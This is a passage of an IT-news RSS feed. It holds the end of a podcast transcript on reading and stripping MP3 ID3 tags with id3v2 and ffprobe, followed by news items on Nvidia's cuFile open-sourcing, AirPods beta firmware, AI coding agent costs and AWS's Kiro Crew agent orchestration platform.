61</p>

<p>
This provides output as a series of lines containing the official 4 character identifiers from the standard, a description of the identifiers, and the text provided by the authors.</p>

<p>
The identifiers include TIT2 indicating title, TALB indicating show title, TRCK indicating track number, and a number of others.</p>

<p>
You can see the full output in the show notes.</p>

<p>

</p>

<p>

</p>

<p>
id3v2 tag info for LMP68.mp3:</p>

<p>
TIT2 (Title/songname/content description): 68: Frameworks, Filesystems and Fixes</p>

<p>
TPE1 (Lead performer(s)/Soloist(s)): Linux Matters</p>

<p>
TALB (Album/Movie/Show title): Linux Matters</p>

<p>
TYER (Year): 2025</p>

<p>
TRCK (Track number/Position in set): 68</p>

<p>
COMM (Comments): ()[]: https://linuxmatters.sh/</p>

<p>
APIC (Attached picture): (LMP-3000-moon.jpg)[, 3]: image/jpeg, 554576 bytes</p>

<p>
LMP68.mp3: No ID3v1 tag</p>

<p>

</p>

<p>
62</p>

<p>
From this we can see what the id3v2 program would normally do with ID3v2 tags. </p>

<p>
Note that it outputs the actual 4 character identifiers, plus a description of what they mean, and then the actual data.</p>

<p>
This helps when trying to understand the actual encoding of the data.</p>

<p>

</p>

<p>

</p>

<p>
63 Using ffprobe</p>

<p>
Now let's try that with ffprobe.</p>

<p>

</p>

<p>
The command is</p>

<p>

</p>

<p>
ffprobe -hide_banner LMP68.mp3</p>

<p>

</p>

<p>
64</p>

<p>
This provides the same publisher provided data as before.</p>

<p>
However it does not display the 4 character identifiers but instead uses its own format for display.</p>

<p>

</p>

<p>
Also note in both cases that there is a picture embedded in the MP3 file which is used to generate an icon for display in your file manager.</p>

<p>

</p>

<p>
With ffprobe this results in there being two keys called "title" and two keys called "comment". </p>

<p>
This makes grepping for the metadata more complicated, but it should still be possible.</p>

<p>
You can see the full output in the show notes.</p>

<p>

</p>

<p>

</p>

<p>
Input #0, mp3, from 'LMP68.mp3':</p>

<p>
  Metadata:</p>

<p>
	title           : 68: Frameworks, Filesystems and Fixes</p>

<p>
	artist          : Linux Matters</p>

<p>
	album           : Linux Matters</p>

<p>
	comment         : https://linuxmatters.sh/</p>

<p>
	track           : 68</p>

<p>
	date            : 2025</p>

<p>
  Duration: 00:28:12.45, start: 0.025056, bitrate: 114 kb/s</p>

<p>
  Stream #0:0: Audio: mp3, 44100 Hz, mono, fltp, 112 kb/s</p>

<p>
	Metadata:</p>

<p>
	  encoder         : LAME3.100</p>

<p>
  Stream #0:1: Video: mjpeg (Progressive), yuvj444p(pc, bt470bg/unknown/unknown), 4166x4166 [SAR 72:72 DAR 1:1], 90k tbr, 90k tbn (attached pic)</p>

<p>
	Metadata:</p>

<p>
	  title           : LMP-3000-moon.jpg</p>

<p>
	  comment         : Cover (front)</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
65 Episode 82</p>

<p>
Now lets try that again with a different episode, 82.</p>

<p>

</p>

<p>
Using id3v2</p>

<p>

</p>

<p>
The command for id3v2 is</p>

<p>

</p>

<p>
id3v2 -l LMP82.mp3</p>

<p>

</p>

<p>
This results in id3v2 saying</p>

<p>

</p>

<p>
LMP82.mp3: No ID3 tag</p>

<p>

</p>

<p>
What happened here?</p>

<p>

</p>

<p>
66 Using ffprobe</p>

<p>

</p>

<p>
Let's try that again with ffprobe.</p>

<p>
The command</p>

<p>

</p>

<p>
ffprobe -hide_banner LMP82.mp3</p>

<p>

</p>

<p>
provides the expected output.</p>

<p>

</p>

<p>
Input #0, mp3, from 'LMP82.mp3':</p>

<p>
  Metadata:</p>

<p>
	date            : 2026-05</p>

<p>
	title           : 82: Ditching Grammarly for Open Sauce</p>

<p>
	album           : Linux Matters</p>

<p>
	track           : 82</p>

<p>
	artist          : Linux Matters</p>

<p>
	comment         : https://linuxmatters.sh</p>

<p>
  Duration: 00:33:37.83, start: 0.025056, bitrate: 113 kb/s</p>

<p>
  Stream #0:0: Audio: mp3, 44100 Hz, mono, fltp, 112 kb/s</p>

<p>
  Stream #0:1: Video: png, rgb24(pc, gbr/unknown/unknown), 3000x3000, 90k tbr, 90k tbn (attached pic)</p>

<p>
	Metadata:</p>

<p>
	  title           : Linux Matters Logo</p>

<p>
	  comment         : Cover (front)</p>

<p>

</p>

<p>
67</p>

<p>
This results in a few minor changes from episode 68, but otherwise it looks the same.</p>

<p>
So there are ID3 tags, but for some reason id3v2 couldn't recognize them.</p>

<p>

</p>

<p>
A bit more research and experimentation shows that this change appears to have happened right after episode 68, when they changed hosting and processing arrangements.</p>

<p>

</p>

<p>
I suspect that something changed with respect to the ID3v2 tag formatting somewhere along the way in the change over, and this in turn has affected the ability of the id3v2 program to recognize the tags.</p>

<p>

</p>

<p>
I will come back to the implications of this later in my conclusions.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
68 Stripping ID3 Tags</p>

<p>

</p>

<p>
Now let's turn to a differen topic. </p>

<p>

</p>

<p>
Stripping ID3 tags refers to removing the ID3 tags from the audio file.</p>

<p>

</p>

<p>
I will start off by emphasizing that normally, you don't want to do this.</p>

<p>
You should only be doing it if you suspect the ID3 tags are causing a problem with the playback or ordering of the files.</p>

<p>

</p>

<p>
69</p>

<p>
In my case I do it when I have problems with my MP3 player when playing certain podcasts.</p>

<p>
This MP3 player orders files according to ID3 tags rather than by file name.</p>

<p>
This can result in the podcasts being played in an unpredictable order which I find undesirable.</p>

<p>
This is particularly a problem with podcasts from certain publishers where the title data does not follow any consistent pattern, but is whatever someone felt like doing that day.</p>

<p>

</p>

<p>
70</p>

<p>
I also often have to normalize the files from the same publishers to get a consistent audio loudness.</p>

<p>
See my series on Simple Podcasting for information on how to use ffmpeg to normalize the audio loudness.</p>

<p>

</p>

<p>
The solution to the inconsistent tag formats in these cases is to simply strip the ID3 tags altogether.</p>

<p>
The player then falls back on using the file names, and I can readily rename the files to a consistent format.</p>

<p>

</p>

<p>
I have never had these sorts of problems with HPR podcasts.</p>

<p>
If you are not having any problems of this nature, then as I said, don't bother stripping the tags.</p>

<p>

</p>

<p>
71</p>

<p>
To strip the ID3 tags from an MP3 file use the following.</p>

<p>

</p>

<p>
id3v2 -D hpr4678.mp3</p>

<p>

</p>

<p>
id3v2 will strip the tags and overwrite the existing file.</p>

<p>
If you wish to keep a copy with the tags, be sure to keep a backup before you try things.</p>

<p>

</p>

<p>
72</p>

<p>
When it comes to stripping tags, the options are</p>

<p>

</p>

<p>
"-s" deletes ID3v1 tags.</p>

<p>
"-d" deletes ID3v2 tags.</p>

<p>
"-D" deletes both v1 and v2 tags.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
73 Conclusions</p>

<p>

</p>

<p>
In this episode we took a very brief look at ID3 tags and vorbis comments and ways of reading them.</p>

<p>

</p>

<p>
74</p>

<p>
ID3 tags and Vorbis comments provide a means of allowing information about an MP3 or OGG Vorbis file to be embedded in the file itself.</p>

<p>
Podcast publishers very often use this to label the file with information such as title, publisher, and author.</p>

<p>
We can read this information using Fee Software tools such as ffprobe, ID3v2, and vorbiscomment.</p>

<p>

</p>

<p>
75</p>

<p>
ID3 tags seem to be a mess with more than one incompatible versions, and difficulties in reading them even within the same version.</p>

<p>
They are difficult to test for because there is so much hardware out there of varying ages, much of which you will never have heard of let alone had access to.</p>

<p>
If you are recording episodes for HPR you do not have to worry about this, as HPR will do this behind the scenes for you.</p>

<p>
However, if you are responsible for producing a podcast or other similar audio and you have a setup that works, it is probably best not to change anything without good reason. </p>

<p>

</p>

<p>
76</p>

<p>
Vorbis comments seem to be much less of a problem.</p>

<p>
However, there are far fewer devices which can play OGG files compared to MP3, so simply switching to OGG may not be a realistic solution to the ID3 tag problem.</p>

<p>

</p>

<p>
77</p>

<p>
If you wish to have one tool that can read ID3 tags of all sorts and vorbis comments, then ffprobe is your obvious choice.</p>

<p>

</p>

<p>
78</p>

<p>
The ID3v2 program will provide more information about the ID3 tags, including the actual identifiers used. However, it does not work in all cases.</p>

<p>

</p>

<p>
79</p>

<p>
The vorbiscomment program will read Vorbis comments from OGG files in a manner which is closer to the actual vorbis format than ffprobe does, which uses its own display format.</p>

<p>

</p>

<p>
80</p>

<p>
HPR includes both ID3v1 and ID3v2 tags in its MP3 files. </p>

<p>
ffprobe can be used to read the ID3v2 tags, and the id3v2 program can be used to read the ID3v1 tags.</p>

<p>
You can also read the ID3v1 tags using the tail command.</p>

<p>

</p>

<p>
81</p>

<p>
I have barely scratched the surface of this subject and have not talked at all about creating tags or comments.</p>

<p>
If anyone else would like to take up the challenge of providing more detail, or of correcting any mistakes that  have made, please send in a podcast episode on the subject.</p>

<p>
If you have any comments you would like to make, leave them in the comment section below this episode on the HPR web site.</p>

<p>

</p>

<p>
82</p>

<p>
I hope to see you all again in future in another episode of HPR.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
References</p>

<p>

</p>

<p>
https://id3.org/Introduction</p>

<p>
https://www.xiph.org/</p>

<p>
https://wiki.xiph.org/VorbisComment</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4698/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia moves to accelerate storage access, boost industry cooperation]]></title>
<description><![CDATA[Nvidia is looking to speed access to AI storage and memory systems by open-sourcing its cuFile APIs and software stack. It’s also promoting a new 40-vendor initiative that aims to standardize GPU-driven storage advancements.



At this week’s Future of Memory and Storage (FMS) conference, Nvidia ...]]></description>
<link>https://tsecurity.de/de/3704270/it-security-nachrichten/nvidia-moves-to-accelerate-storage-access-boost-industry-cooperation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704270/it-security-nachrichten/nvidia-moves-to-accelerate-storage-access-boost-industry-cooperation/</guid>
<pubDate>Tue, 04 Aug 2026 22:24:52 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/3562856/nvidia-latest-news-and-insights__trashed.html">Nvidia</a> is looking to speed access to AI storage and memory systems by open-sourcing its <a href="https://github.com/xio-sig" target="_blank" rel="noreferrer noopener">cuFile</a> APIs and software stack. It’s also promoting a new 40-vendor initiative that aims to standardize GPU-driven storage advancements.</p>



<p class="wp-block-paragraph">At this week’s <a href="https://www.terrapinn.com/conference/future-memory-storage/index.stm">Future of Memory and Storage (FMS) conference</a>, Nvidia said it would open-source its cuFile APIs and the vertical storage software stack underneath them, which allow GPUs, not just CPUs, to read from and write to storage directly. cuFile is an Nvidia software library that is part of its GPUDirect Storage (GDS) platform, and the APIs will be developed under the <strong><a href="https://github.com/xio-sig">Accelerated IO Special Interest Group</a></strong> (xio-sig), an industry consortium focused on creating open standards for high-performance, low-latency I/O.</p>



<p class="wp-block-paragraph">The move is intended to foster broader adoption and interoperability across the AI storage industry, making cuFile a more open foundation for AI-native storage rather than a proprietary Nvidia-only interface, according to <a href="https://www.linkedin.com/in/hardyjason/">Jason Hardy</a>, vice president of storage technology at Nvidia. </p>



<p class="wp-block-paragraph">As GPUs become faster, storage is increasingly the bottleneck, and many GPUs can process data faster than many storage systems can deliver it. The idea behind cuFile is to increase storage throughput, reduce latency, improve GPU utilization, and speed AI training and inference workloads, Hardy wrote in a <a href="https://blogs.nvidia.com/blog/ai-storage-fms/">blog post</a> about the news.</p>



<p class="wp-block-paragraph">“Using hundreds of thousands of GPU threads, fast high-bandwidth memory and other methodologies, cuFile enables securely accessing data from storage in just microseconds,” Hardy wrote. “In addition, fast, secure access to data and storage is a foundational element to powering preventive and detective cybersecurity measures. Making cuFile openly available will help make security context, data and storage accessible at the speed AI-powered defenses need. Such open technologies support initiatives such as the new <a href="https://blogs.nvidia.com/blog/open-secure-ai-alliance/">Open Secure AI Alliance</a>.”</p>



<p class="wp-block-paragraph">The xio-sig site is the new home for APIs that are open to contributions — with Google, Intel, Nvidia, and Meta as some of the first contributors — and can be optimized for use across various software and hardware platforms, driving innovation and efficiency for developers and enterprises, according to Hardy.</p>



<p class="wp-block-paragraph">Nvidia also said it will be a leader of a new memory and storage industry initiative called Storage-Next. Storage-Next will bring together over 40 storage makers, controller vendors, thermal design, cooling and orchestration operators, and standards bodies to align on how GPU-driven storage should behave — then turn these advancements into interoperable, open industry standards, Hardy stated. The group will include DDN, Kioxa and Micron, each contributing to AI storage technologies.</p>



<p class="wp-block-paragraph">“The initiative is grounded in accelerated data access for large AI datasets. To support this effort, Nvidia offers scaled, accelerated data access or SCADA — a framework that lets massively parallel GPUs pull only the data necessary for the application directly from storage into their own high-speed memory,” Hardy stated.</p>



<p class="wp-block-paragraph">Storage vendor DDN is integrating SCADA with Infinia, its software-defined, AI-native data intelligence platform, for example. “Our collaboration with Nvidia is helping create a more direct, efficient connection between GPUs and data — keeping accelerated computing resources productive, speeding time to insight and enabling customers to achieve stronger business and financial returns from their AI investments,” stated Sven Oehme, chief technology officer at DDN, in the Hardy blog.</p>



<p class="wp-block-paragraph">Hardy added that Storage-Next and SCADA extend Nvidia’s <a href="https://zkresearch.com/the-convergence-of-context-why-nvidias-bluefield-4-stx-marries-the-network-and-storage-admin/">longstanding work on AI storag</a>e infrastructure, including its Nvidia Vera BlueField-4 STX — a modular, rack-scale foundation powered by the Nvidia Vera Rubin platform, Vera BlueField-4 storage processors, and Spectrum-X Ethernet networking. </p>



<p class="wp-block-paragraph">Nvidia’s STX unifies its Vera, Rubin, and BlueField-4 packages into a system fort high-performance storage, enterprise AI data, and memory. Nvidia STX is a key driver for the vendor as it unifies its Vera, Rubin, BlueField-4 and Spectrum-X Ethernet networking technologies to offer a blueprint for customers to upgrade traditional storage systems, Nvidia <a href="https://www.nvidia.com/en-us/data-center/ai-storage/stx/?utm_source=chatgpt.com">states</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AirPods Pro, AirPods Max get another iOS 27 beta firmware release]]></title>
<description><![CDATA[Apple has introduced new beta firmware for AirPods, AirPods Pro, and AirPods Max, so that developers can continue testing out inbound iOS 27 features.AirPods ProApple will be introducing a number of new features for select AirPods models this fall, as part of the iOS 27 and other 27-gen operating...]]></description>
<link>https://tsecurity.de/de/3704242/ios-mac-os/airpods-pro-airpods-max-get-another-ios-27-beta-firmware-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704242/ios-mac-os/airpods-pro-airpods-max-get-another-ios-27-beta-firmware-release/</guid>
<pubDate>Tue, 04 Aug 2026 22:17:23 +0200</pubDate>
<content:encoded><![CDATA[Apple has introduced new beta firmware for <a href="https://appleinsider.com/inside/airpods" title="AirPods" data-kpt="1">AirPods</a>, AirPods Pro, and AirPods Max, so that developers can continue testing out inbound iOS 27 features.<br><br><div><img src="https://media.appleinsider.com/gallery/68463-144249-68187-143741-67971-143293-AirPods-Pro-1-xl-xl-xl.jpg" alt="White wireless earbuds in an open charging case resting on an orange surface, with a second closed case lying behind them, all in a clean, minimalistic setting"><br><span>AirPods Pro</span></div><br>Apple will be introducing a number of new features for select AirPods models this fall, as part of the <a href="https://appleinsider.com/inside/ios-27" title="iOS 27" data-kpt="1">iOS 27</a> and other 27-gen operating system releases. Ahead of that release, it is testing out the features via beta firmware builds.<br><br>The new firmware, build 9A5336b, replaces the <a href="https://appleinsider.com/articles/26/07/07/airpods-firmware-beta-lets-developers-use-new-ios-27-features">previous build</a>, 9A5314b, which Apple seeded on July 7. It can be downloaded to the <a href="https://appleinsider.com/inside/airpods-pro-2" title="AirPods Pro 2" data-kpt="1">AirPods Pro 2</a> and AirPods Pro 3, AirPods 4, and <a href="https://appleinsider.com/inside/airpods-max" title="AirPods Max" data-kpt="1">AirPods Max 2</a>.<br><br><br> <a href="https://appleinsider.com/articles/26/08/04/airpods-pro-airpods-max-get-another-ios-27-beta-firmware-release?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245164?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding agents are blowing through budgets — Replit, Kilo Code, and Symbotic explain how they're managing it]]></title>
<description><![CDATA[At Kilo Code, engineers are reading or writing code themselves only about 1% of the time now, according to co-founder Emilie Schario — the rest is agents. That shift is forcing new questions onto dev teams: which systems are safe to hand over, who cleans up when models goof up, how to support mul...]]></description>
<link>https://tsecurity.de/de/3703986/it-nachrichten/ai-coding-agents-are-blowing-through-budgets-replit-kilo-code-and-symbotic-explain-how-theyre-managing-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703986/it-nachrichten/ai-coding-agents-are-blowing-through-budgets-replit-kilo-code-and-symbotic-explain-how-theyre-managing-it/</guid>
<pubDate>Tue, 04 Aug 2026 19:32:13 +0200</pubDate>
<content:encoded><![CDATA[<p>At Kilo Code, engineers are reading or writing code themselves only about 1% of the time now, according to co-founder Emilie Schario — the rest is agents. That shift is forcing new questions onto dev teams: which systems are safe to hand over, who cleans up when models goof up, how to support multi-model architectures, and whether skyrocketing token bills mean real progress or just burned IT budget.</p><p>As far as tech leads from Replit, Kilo Code, and Symbotic are concerned, it’s a natural — and welcome — evolution as agentic AI becomes embedded into more and more enterprise workflows. </p><p>“Unless something's really broken or debugging, 99% of the time engineers are not reading or writing code anymore,” Emilie Schario, co-founder of Kilo Code, said at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>. </p><div></div><h2>AI good at greenfield, not so great at brownfield</h2><p>For Jared Go, distinguished engineer for AI and cloud at warehouse automation company Symbotic, the current moment is about directing the focus of AI. "These are my criteria," he said. "Let's look at it from the lens of security, elegance, clean, concise code, water tightness." That way, AI does most of the heavy lifting, and human code review isn't as critical.</p><p>Human involvement becomes necessary further down the line, Go noted, because agents don't make strong product decisions. “Greenfield [building brand new codebases] is so easy for agents. Brownfield [writing, updating, or maintaining existing code] we all know is where the actual challenge lies.” </p><p>Replit takes a bit of a different tack: While the company has "gone very agentic," they've been more conservative with AI coding, explained Amol Jain, head of product engineering. An agent reviews each pull request (PR) and assigns it a risk score; low-risk PRs are self-merged by their author, while others go to human reviewers who read the code and give feedback.</p><p>“The idea was human on the loop, not human in the loop,” Jain said. Replit’s internal tool is essentially self-driving for software engineers; devs give a task to agents, which do end to end planning, implementation, and testing. </p><p>“It's a fleet of agents that run in their own cloud virtual machines (VMs) with access controls behind token proxies so they're secure,” Jain said. </p><p>He shared one example where an engineer couldn’t repro or solve a “very gnarly bug” deep in its systems. It was sent to an AI manager agent, which told it to go to sleep. The manager agent then spun up a bunch of underlying agents that found the issue; it subsequently spun up a bunch more agents that found the fix. Six hours later, AI had a PR ready for the bug that had puzzled human engineers. </p><h2>Multi-model is the future </h2><p>AI providers are also evolving beyond the lock-in model, as customers increasingly demand multi-model choice. </p><p>Kilo Code, for its part, supports 500-plus models in its gateway. "Your software that you're using to do agentic engineering should be decoupled from the model that you're using to do it," Schario said.</p><p>For instance, Schario said companies often use expensive frontier-tier models to architect a project, then switch to a less expensive open-weight model for the rest of the work.</p><p>It’s also important to respect model provider limitations, such as when they need to work in closed or isolated environments or providers in their specific regions. “It's factoring in what's important to you, what limitations you've set, what data retention policies you've established, what keys you've brought in, what commits you might have … into that routing decision,” Schario said. </p><p>Replit, similarly, tends to have a better sense of the cost versus capability spectrum than its customers, Jain contended. “We are essentially making the decisions on users' behalf of what model to use when, in what capacity, to minimize cost and maximize capability.”</p><h2>To tokenmaxx or not to tokenmaxx</h2><p>Of course, an important consideration as AI adoption increases is runaway costs, which has led to some enterprises tracking and capping AI use through tokenmaxxing.</p><p>Concerns come from both sides, Schario said: internally and from customers. From the latter, she's hearing, "I accidentally spent my whole AI budget for the year … so what do I do now?" In response, Schario said Kilo Code points customers to the same workflow: use expensive models for planning, then open-weight models for affordability.</p><p>Further, sharing skills, strong guidance, and Model Context Protocol (MCP) will empower models. “Realizing where you can really uplevel your team to help them get the most out of the models they're using is going to make a big difference,” Schario said. </p><p>Internally, meanwhile, Schario noted one particular engineer that has a "heavy foot" and is constantly at the top of the usage board. "I regularly have to nudge, 'What are you doing there?'" she said. It's easy to look at a $600 bill for daily work and react, "Wow, that's so much," but looking at the amount of work completed can sometimes justify the cost.</p><p>“Cost per pull request is the metric that I'm paying attention to right now,” Schario said. “It feels like the closest proximity for how I can measure value.” Ultimately, AI changes how enterprises are thinking about ROI because spend is not the problem. “The spend with no return on that spend is the problem.” </p><p>Symbotic, for its part, has set per-month cost tiers for its employees. The company built a tool that gives managers visibility into PRs and usage trends. They can then move users up or down a tier as they see fit, Go explained. “Having a cap and seeing how many people went up in cap this month makes a big difference when you're trying to corral these costs and make things efficient,” Go said. </p><p>When Cursor — which Symbotic uses heavily — ended a legacy discount that had grandfathered the company into a flat per-request rate even for frontier models, and moved everyone to full pricing, it forced a company-wide reckoning on efficiency, Go said. "People were saying, 'You should try this model … This works better for this C# code, this whatever,'" he said.</p><p>But the cost problem is increasingly moving out of IT; Replit, for one, broadened agents beyond engineering, and eventually found that a user on the support side had "blown through an insane amount of money," Jain said. When they looked under the hood, they figured out it was because they were running an automation on GPT 5.5 Pro Max.</p><p>“At least till that point, the ROI was rather clear,” Jain said. “We could see engineering productivity 3X, so no one had questioned it yet.” </p><p>Visibility that isn’t “anti-productive,” model routing, and sensible defaults are critical, he emphasized. “Most tasks do not need the frontier.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS’s Kiro Crew aims to turn AI coding agents into autonomous engineering teams]]></title>
<description><![CDATA[AWS on Tuesday released Kiro Crew, an open-source orchestration platform designed to help enterprises move beyond interactive AI coding assistants toward long-running, autonomous engineering workflows that span repositories, developer tools, and multiple work sessions.



Rather than simply gener...]]></description>
<link>https://tsecurity.de/de/3703956/ai-nachrichten/awss-kiro-crew-aims-to-turn-ai-coding-agents-into-autonomous-engineering-teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703956/ai-nachrichten/awss-kiro-crew-aims-to-turn-ai-coding-agents-into-autonomous-engineering-teams/</guid>
<pubDate>Tue, 04 Aug 2026 19:06:14 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AWS on Tuesday released Kiro Crew, an open-source orchestration platform designed to help enterprises move beyond interactive AI coding assistants toward long-running, autonomous engineering workflows that span repositories, developer tools, and multiple work sessions.</p>



<p class="wp-block-paragraph">Rather than simply generating code, Kiro Crew coordinates multiple AI agents, schedules recurring work, preserves project context across sessions, and integrates with developer tools to investigate incidents, monitor pull requests (PRs), triage tickets, and automate software engineering tasks while developers are away from their keyboards, according to the hyperscaler.</p>



<p class="wp-block-paragraph">“Kiro Crew is a persistent, open-source development workspace for work that is bigger than a single task in a single session,” <a href="https://www.linkedin.com/in/darko-mesaros/" target="_blank" rel="noreferrer noopener">Darko Mesaros</a>, distinguished developer advocate at AWS, told InfoWorld. “Think of it as an application layer that turns AI coding agents into always-working, self-learning, autonomous teammates.”</p>



<p class="wp-block-paragraph">To support that model, the offering ships with persistent memory, multi-agent orchestration tools, approval workflows, scheduling, security controls such as sandboxing and signed audit logs, and a web and desktop dashboard for monitoring agent activity, the hyperscaler said in a statement.</p>



<p class="wp-block-paragraph">Kiro Crew was originally developed inside Amazon as an internal project called MeshClaw and was later adopted by more than 39,000 Amazon builders in less than six months.</p>



<p class="wp-block-paragraph">It can be deployed entirely inside customer environments, including laptops, containers, or virtual machines, without requiring an AWS account or AWS-managed control plane, AWS said.</p>



<p class="wp-block-paragraph">To demonstrate how the new offering can be used, AWS is also launching a set of reference applications built on top of it, including DevFleets for worktree management, Issue Radar for issue and pull-request triage, and Task Runner for executing long-running engineering tasks.</p>



<p class="wp-block-paragraph">Rather than standalone products, these apps combine purpose-built user interfaces with Kiro Crew’s orchestration engine, memory, scheduling, integrations, and backend services to automate specific engineering workflows, Mesaros said, adding that the hyperscaler is expected to add more such apps in the future.</p>



<h2 class="wp-block-heading">Boosting developer productivity</h2>



<p class="wp-block-paragraph">Such applications, according to <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Strategy and Insights, would help platform engineering, DevOps, and site reliability engineering (SRE) teams, where much of the work involves repetitive, long-running operational tasks rather than writing entirely new software.</p>



<p class="wp-block-paragraph">“These tasks can include dependency upgrades, framework migrations, flaky test cleanup, triaging and routing a ticket queue, and the first pass on an incident investigation,” Leone said.</p>



<p class="wp-block-paragraph">“It’s a strong fit for long-running migrations that require checkpoints and retries over hours without supervision,” echoed <a href="https://www.linkedin.com/in/manoj-chandra-jha-b5ab0a13/" target="_blank" rel="noreferrer noopener">Manoj Chandra Jha</a>, principal analyst at Nord-IQ Research.</p>



<p class="wp-block-paragraph">Taken together, those capabilities could significantly reduce software release cycles as well as the time developers spend supervising AI tools and reconnecting context between engineering workflows, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005347" target="_blank" rel="noreferrer noopener">Dave McCarthy</a>, vice president of enterprise infrastructure at IDC.</p>



<p class="wp-block-paragraph">“It eliminates context-switching and babysitting single prompts. Work continues asynchronously in the background while developers are in meetings, off the clock, or asleep, allowing teams to return to completed progress rather than a stalled process,” McCarthy said.</p>



<p class="wp-block-paragraph">That, in turn, will allow developers to spend more time on higher-value engineering tasks, such as designing systems, making architectural decisions, and solving complex engineering problems, echoed <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, executive research leader at HFS Research.</p>



<h2 class="wp-block-heading">Why CIOs should care</h2>



<p class="wp-block-paragraph">Kiro Crew’s open-source, self-hosted architecture could help enterprises looking to bring governance and visibility to the growing use of AI coding agents, analysts said.</p>



<p class="wp-block-paragraph">“Agent use inside most companies right now is shadow IT, with individual developers wiring up their own agents against their own credentials and nobody tracking it. A shared workspace with approval gates and logging gives you one place to see what ran, what it touched, and who authorized it,” said Leone.</p>



<p class="wp-block-paragraph">Those governance capabilities, combined with the ability to run inside customer-controlled environments, according to Chaturvedi, could also help CIOs address security and compliance concerns: “Being open source and self-hostable, a CIO can run it on their own infrastructure and keep code and credentials inside their perimeter rather than sending them to a black-box agent.”</p>



<p class="wp-block-paragraph">That reduction in security concerns, combined with Kiro Crew’s human-approval workflows, could provide enterprises with a lower-risk path to broader agent adoption, Jha said. “Since it embeds consistency and security screening at scale, and because review remains human-approved, it’s a low-risk entry point for demonstrating agentic ROI before extending trust to higher-stakes, unattended workflows.”</p>



<h2 class="wp-block-heading">Not without trade-offs</h2>



<p class="wp-block-paragraph">Despite its benefits, the adoption of Kiro Crew comes with trade-offs, analysts warned.</p>



<p class="wp-block-paragraph">Adopting Kiro Crew may not be a simple plug-and-play operation, said <a href="https://www.linkedin.com/in/slwalter/" target="_blank" rel="noreferrer noopener">Stephanie Walter</a>, practice lead for AI Stack at HyperFRAME Research. Rather, it introduces yet another orchestration layer for enterprises to manage and secure, she said.</p>



<p class="wp-block-paragraph">Enterprises would need to draft up policies covering least-privilege access, human approvals, memory retention, code provenance, and auditability before allowing persistent agents to operate across source code repositories and CI/CD pipelines, Walter said.</p>



<p class="wp-block-paragraph">More so because most enterprises, Walter added, are still not operationally ready to manage swarms of autonomous AI agents: “Many are still struggling to measure the cost and value of individual AI agents. Parallel agents multiply model calls, compute, CI activity, API usage, tool access, and human review, not just token consumption.”</p>



<h2 class="wp-block-heading">Open architecture, but questions remain</h2>



<p class="wp-block-paragraph">Even for organizations that are ready to experiment with autonomous coding agents, integrating Kiro Crew into existing development environments may require additional work.</p>



<p class="wp-block-paragraph">Although AWS built Kiro Crew around open standards such as Agent Client Protocol (ACP) and Model Context Protocol (MCP), the platform runs on the proprietary <a href="https://kiro.dev/cli/" target="_blank" rel="noreferrer noopener">Kiro CLI</a> at launch, according to Mesaros.</p>



<p class="wp-block-paragraph">That means enterprises using other AI coding agents, such as Claude Code, Codex, or Devin, may need to build and validate their own connectors before they can use Kiro Crew as their orchestration layer.</p>



<p class="wp-block-paragraph">“The dependency is real. AWS says Crew runs on the Kiro CLI at launch, and that CLI is proprietary and metered by credits, so it’s the harness actually wired up on day one. Until someone runs a different agent under Crew and shows it working, the open part stops at the orchestration layer,” said Leone.</p>



<p class="wp-block-paragraph">For enterprises and development teams already using Kiro, however, adoption is expected to be more straightforward, as Kiro Crew can reuse existing .kiro configurations, including steering files, skills, and custom agents, without requiring additional setup, according to Mesaros.</p>



<p class="wp-block-paragraph">The new offering, due to its open-source nature, is free as well, Mesaros pointed out, adding that customers need to pay only for the AI coding agents and tools they choose to connect to Crew.</p>



<p class="wp-block-paragraph">AWS said it will govern the project through a publicly listed steering committee operating under an open governance model, with proposals submitted as pull requests and debated openly.</p>



<p class="wp-block-paragraph">Kiro and AWS engineers will initially maintain the project, with trusted community contributors expected to join the maintainer group over time, it added.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agents vs. agents: how we triage HackerOne reports for $2 each, 85% as well as a human]]></title>
<description><![CDATA[LLMs made it cheap to flood bug bounty programs with submissions. Here's how Elastic built an AI triage agent that matches human decisions 85% of the time, including the architecture, threat model and calibration against 3,300 real reports]]></description>
<link>https://tsecurity.de/de/3703926/it-security-nachrichten/agents-vs-agents-how-we-triage-hackerone-reports-for-2-each-85-as-well-as-a-human/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703926/it-security-nachrichten/agents-vs-agents-how-we-triage-hackerone-reports-for-2-each-85-as-well-as-a-human/</guid>
